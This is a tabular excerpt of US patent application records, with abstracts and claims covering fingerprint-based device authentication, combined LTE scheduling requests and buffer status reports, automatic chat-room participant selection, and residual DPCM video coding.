Unnamed: 0 (int64) | level_0 (int64) | ApplicationNumber (int64) | ArtUnit (int64) | Abstract (string) | Claims (string) | abstract-claims (string) | TechCenter (int64)
|---|---|---|---|---|---|---|---|
9,100 | 9,100 | 16,551,243 | 2,438 | Systems and methods verifying a user during authentication of an integrated device. In one embodiment, the system includes an integrated device and an authentication unit. The integrated device stores biometric data of a user and a plurality of codes and other data values comprising a device ID code uniquely identifying the integrated device and a secret decryption value in a tamper proof format, and when scan data is verified by comparing the scan data to the biometric data, wirelessly sends one or more codes and other data values including the device ID code. The authentication unit receives and sends the one or more codes and the other data values to an agent for authentication, and receives an access message from the agent indicating that the agent successfully authenticated the one or more codes and other data values and allows the user to access an application. | 1. A method comprising:
storing, in a storage element of a user device, fingerprint data of a legitimate user, the user device having an identifier code uniquely identifying the user device; responsive to receiving a request for a fingerprint verification of the legitimate user, capturing scan data from a fingerprint scan using a biometric scanner of the user device; comparing the scan data to the fingerprint data to determine whether the scan data matches the fingerprint data; responsive to a determination that the scan data matches the fingerprint data, establishing a secure communication link between the user device and a reader device proximate to the user device for sending the identifier code uniquely identifying the user device from the user device to the reader device, the reader device sending the identifier code to a trusted authority server for authenticating the identifier code; and responsive to the trusted authority server successfully authenticating the identifier code, receiving a communication from the reader device that a transaction is allowed to complete. 2. The method of claim 1, wherein comparing the scan data to the fingerprint data further comprises comparing a unique pattern of ridges and valleys of a respective fingerprint in the scan data to the fingerprint data. 3. The method of claim 1, wherein the fingerprint data of the legitimate user is stored in encrypted form in the storage element and the identifier code uniquely identifying the user device is stored on the user device. 4. The method of claim 1, wherein the fingerprint data of the legitimate user and the identifier code uniquely identifying the user device are stored in a tamper proof format. 5. The method of claim 1, further comprising storing, in the storage element of the user device, an encryption key and a decryption key used for establishing the secure communication link, the secure communication link being wireless. 6. 
The method of claim 1, further comprising registering the user device with the trusted authority server. 7. The method of claim 1, wherein the identifier code uniquely identifying the user device is provided by the trusted authority server for storage on the user device. 8. The method of claim 1, wherein responsive to the determination that the scan data matches the fingerprint data, signaling a confirmation on the user device that the fingerprint verification is completed. 9. The method of claim 1, wherein the user device comprises one from a group of a mobile phone, a tablet, a laptop, an MP3 player, a mobile gaming device, a watch, and a key fob. 10. The method of claim 1, wherein the reader device is operable on a same system as one from a group of a casino machine, a keyless lock, an ATM machine, a computer, and a point of sale register. 11. The method of claim 1, wherein the storage element is a non-volatile storage element from a group of a read-only memory element and a flash memory element. 12. A system comprising:
a biometric key having a memory including instructions that, when executed by the biometric key, cause the system to:
store, in a storage element of the biometric key, fingerprint data of a legitimate user, the biometric key having an identifier code uniquely identifying the biometric key;
responsive to receiving a request for a fingerprint verification of the legitimate user, capture scan data from a fingerprint scan using a biometric scanner of the biometric key;
compare the scan data to the fingerprint data to determine whether the scan data matches the fingerprint data;
responsive to a determination that the scan data matches the fingerprint data, establish a secure communication link between the biometric key and a reader device proximate to the biometric key for sending the identifier code uniquely identifying the biometric key from the biometric key to the reader device, the reader device sending the identifier code to a trusted authority server for authenticating the identifier code; and
responsive to the trusted authority server successfully authenticating the identifier code, receive a communication from the reader device that a transaction is allowed to complete. 13. The system of claim 12, wherein to compare the scan data to the fingerprint data, the instructions, when executed by the biometric key, further cause the system to compare a unique pattern of ridges and valleys of a respective fingerprint in the scan data to the fingerprint data. 14. The system of claim 12, wherein the fingerprint data of the legitimate user is stored in encrypted form in the storage element and the identifier code uniquely identifying the biometric key is stored on the biometric key. 15. The system of claim 12, wherein the fingerprint data of the legitimate user and the identifier code uniquely identifying the biometric key are stored in a tamper proof format. 16. The system of claim 12, wherein the instructions, when executed by the biometric key, further cause the system to store, in the storage element of the biometric key, an encryption key and a decryption key used for establishing the secure communication link, the secure communication link being wireless. 17. The system of claim 12, wherein the instructions, when executed by the biometric key, further cause the system to register the biometric key with the trusted authority server. 18. The system of claim 12, wherein the identifier code uniquely identifying the biometric key is provided by the trusted authority server for storage on the biometric key. 19. The system of claim 12, wherein the instructions, when executed by the biometric key, further cause the system to signal a confirmation on the biometric key that the fingerprint verification is completed responsive to the determination that the scan data matches the fingerprint data. 20. The system of claim 12, wherein the storage element is a non-volatile storage element from a group of a read-only memory element and a flash memory element. 
| (concatenation of the Abstract and Claims columns) | 2,400 |
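The method of claim 1 and the system of claim 12 above describe the same verification flow: a match against the stored fingerprint template gates the release of the device identifier code, which a reader forwards to a trusted authority before a transaction may complete. The Python sketch below models that flow under stated assumptions: the class names, the exact-match template comparison (claim 2 actually compares ridge/valley patterns), and the string messages are all illustrative, and the secure wireless link is abstracted away.

```python
# Hedged sketch of the flow in claims 1 and 12; all names are illustrative.

class TrustedAuthority:
    """Registry of device identifier codes (registration per claims 6 and 17)."""
    def __init__(self):
        self.registered_ids = set()

    def register(self, device_id):
        self.registered_ids.add(device_id)

    def authenticate(self, device_id):
        return device_id in self.registered_ids


class Reader:
    """Reader device proximate to the key; forwards the ID for authentication."""
    def __init__(self, authority):
        self.authority = authority

    def handle(self, device_id):
        # Tell the key whether the transaction is allowed to complete.
        return "transaction-allowed" if self.authority.authenticate(device_id) else "denied"


class BiometricKey:
    def __init__(self, device_id, fingerprint_template):
        self.device_id = device_id            # identifier code uniquely identifying the device
        self.template = fingerprint_template  # stored fingerprint data of the legitimate user

    def verify_and_transact(self, scan_data, reader):
        # Compare the scan data to the stored template; exact-match comparison
        # is a simplification of the claimed ridge/valley pattern matching.
        if scan_data != self.template:
            return "denied"
        # On a match, send the identifier code over the (abstracted) secure link.
        return reader.handle(self.device_id)


authority = TrustedAuthority()
authority.register("KEY-001")
reader = Reader(authority)
key = BiometricKey("KEY-001", "ridge-valley-template")

print(key.verify_and_transact("ridge-valley-template", reader))  # transaction-allowed
print(key.verify_and_transact("wrong-finger", reader))           # denied
```

Note that a failed scan never releases the identifier code at all, which is the point of the claimed ordering: biometric verification happens locally on the key before anything is transmitted.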
9,101 | 9,101 | 15,565,436 | 2,467 | Briefly, in accordance with one or more embodiments, an apparatus of a user equipment (UE) comprises circuitry to configure a scheduling request (SR) transmission based on a physical uplink control channel (PUCCH), and combine the scheduling request with a buffer status report (BSR). The UE transmits the combined SR and BSR in a single subframe to a network entity, receives uplink resource scheduling from the network entity in reply to the combined SR and BSR, and transmits uplink data to the network entity according to the uplink resource scheduling. | 1-24. (canceled) 25. An apparatus of a user equipment (UE) comprising circuitry to:
configure a scheduling request (SR) transmission based on a physical uplink control channel (PUCCH); combine the scheduling request with a buffer status report (BSR); transmit the combined SR and BSR in a single subframe to a network entity; receive uplink resource scheduling from the network entity in reply to the combined SR and BSR; and transmit uplink data to the network entity according to the uplink resource scheduling. 26. The apparatus as claimed in claim 25, wherein the PUCCH comprises PUCCH format 1, PUCCH format 1b, PUCCH format 2, or PUCCH format 3, or a combination thereof. 27. The apparatus as claimed in claim 25, comprising radio-frequency circuitry to transmit a combined SR and BSR periodically. 28. The apparatus as claimed in claim 25, comprising radio-frequency circuitry to transmit the BSR as a payload of PUCCH format 2 or PUCCH format 3. 29. The apparatus as claimed in claim 25, comprising radio-frequency circuitry to:
transmit a channel state indicator (CSI) or an acknowledgement/negative acknowledgement (ACK/NACK) without transmitting the combined SR and BSR if the combined SR and BSR transmission collides with a CSI transmission or an ACK/NACK transmission in a same PUCCH resource. 30. The apparatus as claimed in claim 29, wherein one bit of the payload indicates an ACK/NACK and a discontinuous transmission (DTX) state, and another bit of the payload indicates a buffer status report group indicator (BSRGI). 31. The apparatus as claimed in claim 25, wherein the BSR is divided into two or more groups, and a threshold is configured by radio resource control (RRC) signaling or as defined by a Third Generation Partnership Project (3GPP) standard. 32. An apparatus of a user equipment (UE) comprising circuitry to:
configure a scheduling request (SR) transmission based on a physical uplink control channel (PUCCH); combine the scheduling request with a buffer status report group indicator (BSRGI); transmit the combined SR and BSRGI in a single subframe to a network entity; receive uplink resource scheduling from the network entity in reply to the combined SR and BSRGI; and transmit uplink data to the network entity according to the uplink resource scheduling. 33. The apparatus as claimed in claim 32, comprising radio-frequency circuitry to transmit the combined SR and BSRGI message based on PUCCH format 2. 34. The apparatus as claimed in claim 33, wherein the BSRGI comprises one bit or two bits at an end of a PUCCH format 2 payload. 35. The apparatus as claimed in claim 32, comprising radio-frequency circuitry to transmit the combined SR and BSRGI message with a periodic channel state indicator (CSI). 36. The apparatus as claimed in claim 32, wherein the SR is not transmitted if bits representing the BSRGI are all zeros. 37. One or more computer-readable media having instructions stored thereon that, if executed by user equipment (UE), result in:
configuring a scheduling request (SR) transmission based on a physical uplink control channel (PUCCH); combining the scheduling request with a buffer status report (BSR); transmitting the combined SR and BSR in a single subframe to a network entity; receiving uplink resource scheduling from the network entity in reply to the combined SR and BSR; and transmitting uplink data to the network entity according to the uplink resource scheduling. 38. The one or more computer-readable media as claimed in claim 37, wherein the PUCCH comprises PUCCH format 1, PUCCH format 1b, PUCCH format 2, or PUCCH format 3, or a combination thereof. 39. The one or more computer-readable media as claimed in claim 37, wherein the instructions, if executed by the UE, result in transmitting a combined SR and BSR periodically. 40. The one or more computer-readable media as claimed in claim 37, wherein the instructions, if executed by the UE, result in transmitting the BSR as a payload of PUCCH format 2 or PUCCH format 3. 41. The one or more non-transitory computer-readable media as claimed in claim 37, wherein the instructions, if executed by the UE, result in:
transmitting a channel state indicator (CSI) or an acknowledgement/negative acknowledgement (ACK/NACK) without transmitting the combined SR and BSR if the combined SR and BSR transmission collides with a CSI transmission or an ACK/NACK transmission in a same PUCCH resource. 42. The one or more non-transitory computer-readable media as claimed in claim 41, wherein one bit of the payload indicates an ACK/NACK and a discontinuous transmission (DTX) state, and another bit of the payload indicates a buffer status report group indicator (BSRGI). 43. The one or more non-transitory computer-readable media as claimed in claim 37, wherein the BSR is divided into two or more groups, and a threshold is configured by radio resource control (RRC) signaling or as defined by a Third Generation Partnership Project (3GPP) standard. 44. One or more non-transitory computer-readable media having instructions stored thereon that, if executed by user equipment (UE), result in:
configuring a scheduling request (SR) transmission based on a physical uplink control channel (PUCCH); combining the scheduling request with a buffer status report group indicator (BSRGI); transmitting the combined SR and BSRGI in a single subframe to a network entity; receiving uplink resource scheduling from the network entity in reply to the combined SR and BSRGI; and transmitting uplink data to the network entity according to the uplink resource scheduling. 45. The one or more non-transitory computer-readable media as claimed in claim 44, wherein the instructions, if executed by the UE, result in transmitting the combined SR and BSRGI message based on PUCCH format 2. 46. The one or more non-transitory computer-readable media as claimed in claim 45, wherein the BSRGI comprises one bit or two bits at an end of a PUCCH format 2 payload. 47. The one or more non-transitory computer-readable media as claimed in claim 44, wherein the instructions, if executed by the UE, result in transmitting the combined SR and BSRGI message with a periodic channel state indicator (CSI). 48. The one or more non-transitory computer-readable media as claimed in claim 44, wherein the SR is not transmitted if bits representing the BSRGI are all zeros. | (concatenation of the Abstract and Claims columns) | 2,400 |
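Claims 25, 29, and 36 above amount to a small decision rule for what the UE transmits on its PUCCH resource in a given subframe: a CSI or ACK/NACK transmission that collides with the combined SR+BSR wins, and an SR accompanied by an all-zero BSRGI is suppressed. The Python sketch below is a hedged illustration of that rule only; the function names and bit encoding are invented, and actual UE behavior is governed by the 3GPP specifications.

```python
# Hedged sketch of the uplink control logic in claims 25, 29, and 36.

def build_pucch_payload(sr_pending, bsr_bits, csi=None, ack_nack=None):
    """Decide what the UE transmits in one subframe on its PUCCH resource.

    Per claim 29: if the combined SR+BSR collides with a CSI or ACK/NACK
    transmission in the same PUCCH resource, the CSI or ACK/NACK is
    transmitted instead and the combined SR+BSR is dropped.
    """
    if csi is not None:
        return ("CSI", csi)
    if ack_nack is not None:
        return ("ACK/NACK", ack_nack)
    if sr_pending:
        # Claim 25: the SR and BSR are combined into a single subframe.
        return ("SR+BSR", bsr_bits)
    return ("nothing", None)


def should_transmit_sr(bsrgi_bits):
    """Claim 36: the SR is not transmitted if the BSRGI bits are all zeros."""
    return any(bit != "0" for bit in bsrgi_bits)


print(build_pucch_payload(True, "01"))                # ('SR+BSR', '01')
print(build_pucch_payload(True, "01", csi="cqi=12"))  # ('CSI', 'cqi=12')
print(should_transmit_sr("00"))                       # False
```

The priority ordering here (CSI and ACK/NACK before SR+BSR) is one reading of claim 29; the claims do not specify the relative priority of CSI versus ACK/NACK, so that ordering is an assumption.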
9,102 | 9,102 | 16,058,186 | 2,449 | A method includes receiving a user electronic input. The user electronic input is selected from a group consisting of logical rules, queries, and a subject matter. A degree of flexibility that is associated with the user electronic input is received from a user. Participants within an organization are identified based on the received user electronic input and further based on the degree of flexibility. An electronic chat room that includes at least a subset of the identified participants is created. | 1. A method comprising:
receiving an electronic user input, wherein the electronic user input is selected from a group consisting of logical rules, queries, and a subject matter; receiving a degree of flexibility from a user via a graphical user interface (GUI), wherein the degree of flexibility is an indication of desired conciseness of the electronic user input; identifying participants within an organization based on the received electronic user input and further based on the degree of flexibility; and creating an online chat room that includes at least a subset of the identified participants. 2. The method as described in claim 1 further comprising updating the identified participants by adding or removing participants within the organization over time and further updating the participants of the subset of the identified participants of the online chat room, wherein the updating is responsive to content of conversation within the online chat room. 3. The method as described in claim 1 further comprising updating the identified participants within the organization over time, wherein the updating is responsive to changes within the organization. 4. The method as described in claim 3, wherein the changes are selected from a group consisting of changes to title, changes to projects, and changes to participants of a group within the organization. 5. The method as described in claim 4 further comprising updating participants of the subset of the identified participants within the online chat room responsive to the changes. 6. The method as described in claim 1, wherein the identifying comprises utilizing machine learning and artificial intelligence to identify the participants. 7. The method as described in claim 1, wherein the identifying is further based on participants of the organization's past projects, expertise, educational degree, department within the organization, title, and interest. 8. A method comprising:
receiving a user input, wherein the user input is selected from a group consisting of logical rules and queries; identifying participants within an organization based on the user input; and creating a chat room that includes at least a subset of the identified participants. 9. The method as described in claim 8 further comprising updating the identified participants within the organization over time and further updating the participants of the subset of the identified participants of the chat room, wherein the updating is responsive to content of conversation within the chat room. 10. The method as described in claim 8 further comprising updating the identified participants within the organization over time, wherein the updating is responsive to changes within the organization. 11. The method as described in claim 10, wherein the changes are selected from a group consisting of changes to title, changes to projects, and changes to participants of a group within the organization. 12. The method as described in claim 11 further comprising updating participants of the subset of the identified participants within the chat room responsive to the changes. 13. The method as described in claim 8, wherein the identifying comprises utilizing machine learning and artificial intelligence to identify the participants. 14. The method as described in claim 8, wherein the identifying is further based on participants of the organization's past projects, expertise, educational degree, department within the organization, title, and interest. 15. A method comprising:
receiving a user input, wherein the user input comprises a subject matter; identifying participants within an organization based on the subject matter of the user input; and creating a chat room that includes at least a subset of the identified participants. 16. The method as described in claim 15 further comprising updating the identified participants within the organization over time and further updating the participants of the subset of the identified participants of the chat room, wherein the updating is responsive to content of conversation within the chat room. 17. The method as described in claim 15 further comprising updating the identified participants within the organization over time, wherein the updating is responsive to changes within the organization. 18. The method as described in claim 17, wherein the changes is selected from a group consisting of changes to title, changes to projects, and changes to participants of a group within the organization. 19. The method as described in claim 18 further comprising updating participants of the subset of the identified participants within the chat room responsive to the changes. 20. The method as described in claim 15, wherein the identifying comprises utilizing machine learning and artificial intelligence to identify the participants. | A method includes receiving a user electronic input. The user electronic input is selected from a group consisting of logical rules, queries, and a subject matter. A degree of flexibility that is associated with the user electronic input is received from a user. Participants within an organization are identified based on the received user electronic input and further based on the degree of flexibility. An electronic chat room that includes at least a subset of the identified participants is created.1. A method comprising:
receiving an electronic user input, wherein the electronic user input is selected from a group consisting of logical rules, queries, and a subject matter; receiving a degree of flexibility from a user via a graphical user interface (GUI), wherein the degree of flexibility is an indication of desired conciseness of the electronic user input; identifying participants within an organization based on the received electronic user input and further based on the degree of flexibility; and creating an online chat room that includes at least a subset of the identified participants. 2. The method as described in claim 1 further comprising updating the identified participants by adding or removing participants within the organization over time and further updating the participants of the subset of the identified participants of the online chat room, wherein the updating is responsive to content of conversation within the online chat room. 3. The method as described in claim 1 further comprising updating the identified participants within the organization over time, wherein the updating is responsive to changes within the organization. 4. The method as described in claim 3, wherein the changes are selected from a group consisting of changes to title, changes to projects, and changes to participants of a group within the organization. 5. The method as described in claim 4 further comprising updating participants of the subset of the identified participants within the online chat room responsive to the changes. 6. The method as described in claim 1, wherein the identifying comprises utilizing machine learning and artificial intelligence to identify the participants. 7. The method as described in claim 1, wherein the identifying is further based on participants of the organization's past projects, expertise, educational degree, department within the organization, title, and interest. 8. A method comprising:
receiving a user input, wherein the user input is selected from a group consisting of logical rules and queries; identifying participants within an organization based on the user input; and creating a chat room that includes at least a subset of the identified participants. 9. The method as described in claim 8 further comprising updating the identified participants within the organization over time and further updating the participants of the subset of the identified participants of the chat room, wherein the updating is responsive to content of conversation within the chat room. 10. The method as described in claim 8 further comprising updating the identified participants within the organization over time, wherein the updating is responsive to changes within the organization. 11. The method as described in claim 10, wherein the changes are selected from a group consisting of changes to title, changes to projects, and changes to participants of a group within the organization. 12. The method as described in claim 11 further comprising updating participants of the subset of the identified participants within the chat room responsive to the changes. 13. The method as described in claim 8, wherein the identifying comprises utilizing machine learning and artificial intelligence to identify the participants. 14. The method as described in claim 8, wherein the identifying is further based on participants of the organization's past projects, expertise, educational degree, department within the organization, title, and interest. 15. A method comprising:
receiving a user input, wherein the user input comprises a subject matter; identifying participants within an organization based on the subject matter of the user input; and creating a chat room that includes at least a subset of the identified participants. 16. The method as described in claim 15 further comprising updating the identified participants within the organization over time and further updating the participants of the subset of the identified participants of the chat room, wherein the updating is responsive to content of conversation within the chat room. 17. The method as described in claim 15 further comprising updating the identified participants within the organization over time, wherein the updating is responsive to changes within the organization. 18. The method as described in claim 17, wherein the changes are selected from a group consisting of changes to title, changes to projects, and changes to participants of a group within the organization. 19. The method as described in claim 18 further comprising updating participants of the subset of the identified participants within the chat room responsive to the changes. 20. The method as described in claim 15, wherein the identifying comprises utilizing machine learning and artificial intelligence to identify the participants. | 2,400 |
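The claims above leave the participant-identification technique open ("machine learning and artificial intelligence ... based on past projects, expertise, ... title, and interest"). As a minimal illustrative sketch only, not the patented method: the `Participant` fields, the keyword-overlap scoring, and the `threshold` knob (a loose stand-in for the claimed degree of flexibility) are all hypothetical names introduced here for illustration.

```python
from dataclasses import dataclass, field


@dataclass
class Participant:
    name: str
    expertise: set
    past_projects: set = field(default_factory=set)


def identify_participants(query_terms, roster, threshold=1):
    """Score each participant by the overlap between the query's
    subject-matter terms and the participant's profile (expertise plus
    past projects); keep those meeting the threshold, best match first."""
    scored = []
    for p in roster:
        score = len(query_terms & (p.expertise | p.past_projects))
        if score >= threshold:
            scored.append((score, p.name))
    scored.sort(reverse=True)  # highest overlap first
    return [name for _, name in scored]


roster = [
    Participant("ana", {"networking", "security"}),
    Participant("bo", {"databases"}, {"security"}),
    Participant("cy", {"design"}),
]
# "security"/"networking" query: ana overlaps on 2 terms, bo on 1, cy on 0
room = identify_participants({"security", "networking"}, roster)
```

Raising `threshold` narrows the chat-room subset to closer matches, loosely mirroring how a stricter degree of flexibility would prune the identified participants.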
9,103 | 9,103 | 14,469,477 | 2,485 | In an example, a method of decoding video data includes generating a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block. The method also includes generating a current block of the picture based on a combination of the residual block and a prediction block of the picture. | 1. A method of decoding video data, the method comprising:
generating a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block; and generating a current block of the picture based on a combination of the residual block and a prediction block of the picture. 2. The method of claim 1, further comprising obtaining the predicted residual block from an encoded bitstream, and wherein generating the residual block comprises applying residual differential pulse code modulation (RDPCM) to the predicted residual block. 3. The method of claim 2, wherein applying the RDPCM to the predicted residual block comprises applying horizontal RDPCM to the one or more predicted residual values. 4. The method of claim 2, wherein applying the RDPCM to the predicted residual block comprises applying vertical RDPCM to the one or more predicted residual values. 5. The method of claim 2, wherein applying the RDPCM comprises obtaining, from the encoded bitstream, data that indicates an RDPCM mode from a plurality of RDPCM modes and applying the indicated RDPCM mode. 6. The method of claim 5, wherein obtaining the data that indicates an RDPCM mode comprises obtaining data that indicates at least one of an RDPCM off mode, an RDPCM vertical mode, and an RDPCM horizontal mode. 7. The method of claim 1, further comprising:
obtaining, from an encoded bitstream, a displacement vector that indicates a location of the prediction block in the picture; and locating the prediction block of the picture using the displacement vector. 8. The method of claim 1, wherein generating the residual block further comprises applying inverse quantization to the residual block in a lossy decoding process. 9. The method of claim 1, wherein generating the residual block comprises generating the residual block without performing inverse quantization in a lossless decoding process. 10. The method of claim 1, further comprising decoding one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the step of generating the residual block of the picture based on the predicted residual block. 11. The method of claim 10, wherein decoding the one or more syntax elements comprises decoding the one or more syntax elements at a sequence level in a sequence parameter set (SPS). 12. The method of claim 10, wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an inter-prediction mode and an intra-BC prediction mode. 13. A method of encoding video data, the method comprising:
generating a residual block for a current block of a picture based on a difference between the current block and a prediction block of the picture; generating a predicted residual block based on the residual block by predicting one or more residual values of the residual block based on one or more other residual values of the residual block; and encoding data that represents the predicted residual block in a bitstream. 14. The method of claim 13, wherein generating the predicted residual block comprises applying residual differential pulse code modulation (RDPCM) to the residual block. 15. The method of claim 14, wherein applying the RDPCM to the residual block comprises applying horizontal RDPCM to the one or more residual values. 16. The method of claim 14, wherein applying the RDPCM to the predicted residual block comprises applying vertical RDPCM to the one or more residual values. 17. The method of claim 14, wherein applying the RDPCM comprises selecting an RDPCM mode from a plurality of RDPCM modes and applying the selected RDPCM mode, the method further comprising encoding data that indicates the selected RDPCM mode. 18. The method of claim 17, wherein encoding data that indicates the selected RDPCM mode comprises encoding data that indicates at least one of an RDPCM off mode, an RDPCM vertical mode, and an RDPCM horizontal mode. 19. The method of claim 13, wherein generating the residual block comprises applying an intra-block copying (intra-BC) process to generate the residual block, wherein applying the intra-BC process comprises determining a region of the picture from which to select the prediction block, and determining a displacement vector that identifies the prediction block, the method further comprising encoding data that represents the displacement vector. 20. The method of claim 13, wherein encoding the data comprises applying quantization to the predicted residual block in a lossy encoding process. 21. 
The method of claim 13, wherein encoding the data comprises encoding the data without applying quantization to the predicted residual in a lossless encoding process. 22. The method of claim 13, further comprising encoding one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the step of generating the predicted residual block. 23. The method of claim 22, wherein encoding the one or more syntax elements comprises encoding the one or more syntax elements at a sequence level in a sequence parameter set (SPS). 24. The method of claim 22, wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an intra-BC mode and an inter-prediction mode. 25. A device for decoding video data, the device comprising:
a memory configured to store the video data; and a video decoder configured to:
generate a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block; and
generate a current block of the picture based on a combination of the residual block and a prediction block of the picture. 26. The device of claim 25, wherein the video decoder is further configured to obtain the predicted residual block from an encoded bitstream, and wherein to generate the residual block, the video decoder is configured to apply residual differential pulse code modulation (RDPCM) to the predicted residual block. 27. The device of claim 26, wherein to apply the RDPCM to the predicted residual block, the video decoder is configured to apply horizontal RDPCM to the one or more predicted residual values. 28. The device of claim 26, wherein to apply the RDPCM to the predicted residual block, the video decoder is configured to apply vertical RDPCM to the one or more predicted residual values. 29. The device of claim 26, wherein to apply the RDPCM, the video decoder is configured to obtain, from the encoded bitstream, data that indicates an RDPCM mode from a plurality of RDPCM modes and applying the indicated RDPCM mode. 30. The device of claim 29, wherein to obtain the data that indicates an RDPCM mode, the video decoder is configured to obtain data that indicates at least one of an RDPCM off mode, an RDPCM vertical mode, and an RDPCM horizontal mode. 31. The device of claim 25, wherein the video decoder is further configured to:
obtain, from an encoded bitstream, a displacement vector that indicates a location of the prediction block in the picture; and locate the prediction block of the picture using the displacement vector. 32. The device of claim 25, wherein to generate the residual block, the video decoder is configured to apply inverse quantization to the residual block in a lossy decoding process. 33. The device of claim 25, wherein to generate the residual block, the video decoder is configured to generate the residual block without performing inverse quantization in a lossless decoding process. 34. The device of claim 25, wherein the video decoder is further configured to decode one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the residual block of the picture based on the predicted residual block. 35. The device of claim 34, wherein to decode the one or more syntax elements, the video decoder is configured to decode the one or more syntax elements at a sequence level in a sequence parameter set (SPS). 36. The device of claim 34, wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an inter-prediction mode and an intra-BC prediction mode. 37. The device of claim 25, further comprising a display configured to display the current block of the picture. 38. A device for encoding video data, the device comprising:
a memory configured to store the video data; and a video encoder configured to:
generate a residual block for a current block of a picture based on a difference between the current block and a prediction block of the picture;
generate a predicted residual block based on the residual block by predicting one or more residual values of the residual block based on one or more other residual values of the residual block; and
encode data that represents the predicted residual block in a bitstream. 39. The device of claim 38, wherein to generate the predicted residual block, the video encoder is configured to apply residual differential pulse code modulation (RDPCM) to the residual block. 40. The device of claim 39, wherein to apply the RDPCM to the residual block, the video encoder is configured to apply horizontal RDPCM to the one or more residual values. 41. The device of claim 39, wherein to apply the RDPCM to the predicted residual block, the video encoder is configured to apply vertical RDPCM to the one or more residual values. 42. The device of claim 39, wherein to apply the RDPCM, the video encoder is configured to select an RDPCM mode from a plurality of RDPCM modes and to apply the selected RDPCM mode, the video encoder is further configured to encode data that indicates the selected RDPCM mode. 43. The device of claim 42, wherein to encode the data that indicates the selected RDPCM mode, the video encoder is configured to encode data that indicates at least one of an RDPCM off mode, an RDPCM vertical mode, and an RDPCM horizontal mode. 44. The device of claim 38, wherein to generate the residual block, the video encoder is configured to apply an intra-block copying (intra-BC) process to generate the residual block, wherein to apply the intra-BC process, the video encoder is configured to determine a region of the picture from which to select the prediction block and to determine a displacement vector that identifies the prediction block, and wherein the video encoder is further configured to encode data that represents the displacement vector. 45. The device of claim 38, wherein to encode the data, the video encoder is configured to apply quantization to the predicted residual block in a lossy encoding process. 46. 
The device of claim 38, wherein to encode the data, the video encoder is configured to encode the data without applying quantization to the predicted residual in a lossless encoding process. 47. The device of claim 38, wherein the video encoder is further configured to encode one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the predicted residual block. 48. The device of claim 47, wherein to encode the one or more syntax elements, the video encoder is configured to encode the one or more syntax elements at a sequence level in a sequence parameter set (SPS). 49. The device of claim 47, wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an intra-BC mode and an inter-prediction mode. 50. The device of claim 38, further comprising a camera sensor configured to generate the current block. 51. A device for decoding video data, the device comprising:
means for generating a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block; and means for generating a current block of the picture based on a combination of the residual block and a prediction block of the picture. 52. The device of claim 51, further comprising means for decoding one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the residual block of the picture based on the predicted residual block, and wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an inter-prediction mode and an intra-BC prediction mode. 53. A device for encoding video data, the device comprising:
means for generating a residual block for a current block of a picture based on a difference between the current block and a prediction block of the picture; means for generating a predicted residual block based on the residual block by predicting one or more residual values of the residual block based on one or more other residual values of the residual block; and means for encoding data that represents the predicted residual block in a bitstream. 54. The device of claim 53, further comprising means for encoding one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the predicted residual block, and wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an intra-BC mode and an inter-prediction mode. 55. A non-transitory computer-readable medium having instructions stored thereon that, when executed, cause one or more processors to:
generate a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block; and generate a current block of the picture based on a combination of the residual block and a prediction block of the picture. 56. The non-transitory computer-readable medium of claim 55, wherein the instructions further cause the one or more processors to decode one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the residual block of the picture based on the predicted residual block, and wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an inter-prediction mode and an intra-BC prediction mode. 57. A non-transitory computer-readable medium having instructions stored thereon that, when executed, cause one or more processors to:
generate a residual block for a current block of a picture based on a difference between the current block and a prediction block of the picture; generate a predicted residual block based on the residual block by predicting one or more residual values of the residual block based on one or more other residual values of the residual block; and encode data that represents the predicted residual block in a bitstream. 58. The non-transitory computer-readable medium of claim 57, wherein the instructions further cause the one or more processors to encode one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the predicted residual block, and wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an intra-BC mode and an inter-prediction mode. | In an example, a method of decoding video data includes generating a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block. The method also includes generating a current block of the picture based on a combination of the residual block and a prediction block of the picture.1. A method of decoding video data, the method comprising:
generating a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block; and generating a current block of the picture based on a combination of the residual block and a prediction block of the picture. 2. The method of claim 1, further comprising obtaining the predicted residual block from an encoded bitstream, and wherein generating the residual block comprises applying residual differential pulse code modulation (RDPCM) to the predicted residual block. 3. The method of claim 2, wherein applying the RDPCM to the predicted residual block comprises applying horizontal RDPCM to the one or more predicted residual values. 4. The method of claim 2, wherein applying the RDPCM to the predicted residual block comprises applying vertical RDPCM to the one or more predicted residual values. 5. The method of claim 2, wherein applying the RDPCM comprises obtaining, from the encoded bitstream, data that indicates an RDPCM mode from a plurality of RDPCM modes and applying the indicated RDPCM mode. 6. The method of claim 5, wherein obtaining the data that indicates an RDPCM mode comprises obtaining data that indicates at least one of an RDPCM off mode, an RDPCM vertical mode, and an RDPCM horizontal mode. 7. The method of claim 1, further comprising:
